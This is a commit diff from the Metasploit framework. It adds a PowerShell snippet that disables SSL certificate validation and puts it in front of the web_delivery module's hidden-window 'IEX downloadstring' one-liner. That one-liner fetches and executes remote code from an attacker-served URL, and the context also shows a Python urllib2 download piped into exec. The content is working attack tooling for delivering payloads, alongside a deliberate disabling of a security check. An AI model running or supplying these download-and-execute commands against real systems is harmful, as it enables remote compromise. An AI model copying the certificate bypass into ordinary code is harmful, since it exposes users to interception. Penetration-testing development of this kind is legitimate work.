Land rapid7#4460, @Meatballs1's ssl cert validation bypass on powershell web delivery

jvazquez-r7 · jvazquez-r7 · commit c1b0385a4bd6 · 2014-12-26T12:07:45.000-06:00
diff --git a/lib/rex/exploitation/powershell/psh_methods.rb b/lib/rex/exploitation/powershell/psh_methods.rb
@@ -64,6 +64,15 @@ def self.who_locked_file(filename)
     def self.get_last_login(user)
       %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
     end
+
+    #
+    # Disable SSL Certificate verification
+    #
+    # @return [String] Powershell code to disable SSL verification
+    #   checks.
+    def self.ignore_ssl_certificate
+      '[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};'
+    end
   end
 end
 end
diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb
@@ -88,7 +88,8 @@ def primer
     when 'Python'
       print_line("python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
     when 'PSH'
-      download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
+      ignore_cert = Rex::Exploitation::Powershell::PshMethods.ignore_ssl_certificate if ssl
+      download_and_run = "#{ignore_cert}IEX ((new-object net.webclient).downloadstring('#{url}'))"
       print_line generate_psh_command_line(
                                              noprofile: true,
                                              windowstyle: 'hidden',
